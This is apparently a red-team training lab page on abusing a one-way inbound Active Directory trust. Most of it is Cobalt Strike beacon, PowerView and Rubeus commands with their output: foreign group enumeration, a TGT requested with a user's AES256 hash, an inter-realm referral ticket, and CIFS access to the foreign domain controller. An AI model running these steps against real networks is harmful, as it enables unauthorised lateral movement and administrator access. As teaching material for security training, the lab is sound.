One-Way Inbound
dev.cyberbotic.io also has a one-way inbound trust with dev-studio.com.
beacon> powershell Get-DomainTrust
SourceName : dev.cyberbotic.io
TargetName : dev-studio.com
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection : Inbound
WhenCreated : 8/16/2022 9:52:37 AM
WhenChanged : 8/16/2022 9:52:37 AM
\
Because the trust is inbound from our perspective, it means that principals in our domain can be granted access to resources in the foreign domain. We can enumerate the foreign domain across the trust.
beacon> powershell Get-DomainComputer -Domain dev-studio.com -Properties DnsHostName
dnshostname
-----------
dc.dev-studio.com
\
Get-DomainForeignGroupMember
will enumerate any groups that contain users outside of its domain and return its members.
beacon> powershell Get-DomainForeignGroupMember -Domain dev-studio.com
GroupDomain : dev-studio.com
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=dev-studio,DC=com
MemberDomain : dev-studio.com
MemberName : S-1-5-21-569305411-121244042-2357301523-1120
MemberDistinguishedName : CN=S-1-5-21-569305411-121244042-2357301523-1120,CN=ForeignSecurityPrincipals,DC=dev-studio,DC=com
\
This output shows that there's a member of the domain's built-in Administrators group who is not part of dev-studio.com. The MemberName field contains a SID that can be resolved in our current domain.
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120
DEV\Studio Admins
\
This means that members of DEV\Studio Admins are also members of the built-in Administrators group of dev-studio.com and therefore inherit local admin access to dc.dev-studio.com. If this is confusing, this is how it looks from the perspective of the foreign domain controller.
\

\
To hop this trust, we only need to impersonate a member of this Studio Admins domain group.
beacon> powershell Get-DomainGroupMember -Identity "Studio Admins" | select MemberName
MemberName
----------
nlamb
\
To hop a domain trust using Kerberos, we first need an inter-realm key. Obtain a TGT for the target user (here I am using asktgt
with their AES256 hash).
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /aes256:a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4 /nowrap
[*] Action: Ask TGT
[*] Using aes256_cts_hmac_sha1 hash: a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFwj[...]MuaW8=
\
Next, use that TGT to request a referral ticket from the current domain to the target domain.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFwj[...]MuaW8= /nowrap
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'krbtgt/dev-studio.com'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFoz[...]NPTQ==
ServiceName : krbtgt/DEV-STUDIO.COM
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : nlamb
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/12/2022 11:13:23 AM
EndTime : 9/12/2022 9:11:21 PM
RenewTill : 9/19/2022 11:11:21 AM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : zfUbwA2B0+aqao7HSvnUgw==
Notice how this inter-realm ticket is of type rc4_hmac
even though our TGT was aes256_cts_hmac_sha1
. This is the default configuration unless AES has been specifically configured on the trust, so this is not necessarily bad OPSEC.
Finally, use this inter-realm ticket to request TGS's in the target domain. Here, I'm requesting a ticket for CIFS.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /ticket:doIFoz[...]NPTQ== /nowrap
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/dc.dev-studio.com'
[*] Using domain controller: dc.dev-studio.com (10.10.150.10)
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFkD[...]8uY29t
ServiceName : cifs/dc.dev-studio.com
ServiceRealm : DEV-STUDIO.COM
UserName : nlamb
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/12/2022 11:16:46 AM
EndTime : 9/12/2022 9:11:21 PM
RenewTill : 9/19/2022 11:11:21 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : V1vCRoRX/9SAFe/ynWQIE9E9DYztP0mk6bg9BRx9Wjk=
\
beacon> run klist
Current LogonId is 0:0x45bcb0
Cached Tickets: (1)
#0> Client: nlamb @ DEV.CYBERBOTIC.IO
Server: cifs/dc.dev-studio.com @ DEV-STUDIO.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
beacon> ls \\dc.dev-studio.com\c$
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/16/2022 09:15:48 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 05/08/2021 08:20:24 PerfLogs
dir 08/19/2021 06:35:15 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 08/16/2022 09:26:24 ProgramData
dir 08/16/2022 08:54:23 Recovery
dir 08/16/2022 09:26:41 System Volume Information
dir 08/16/2022 08:55:34 Users
dir 08/16/2022 09:23:25 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 09/12/2022 08:36:05 DumpStack.log.tmp
384mb fil 09/12/2022 08:36:05 pagefile.sys
Last updated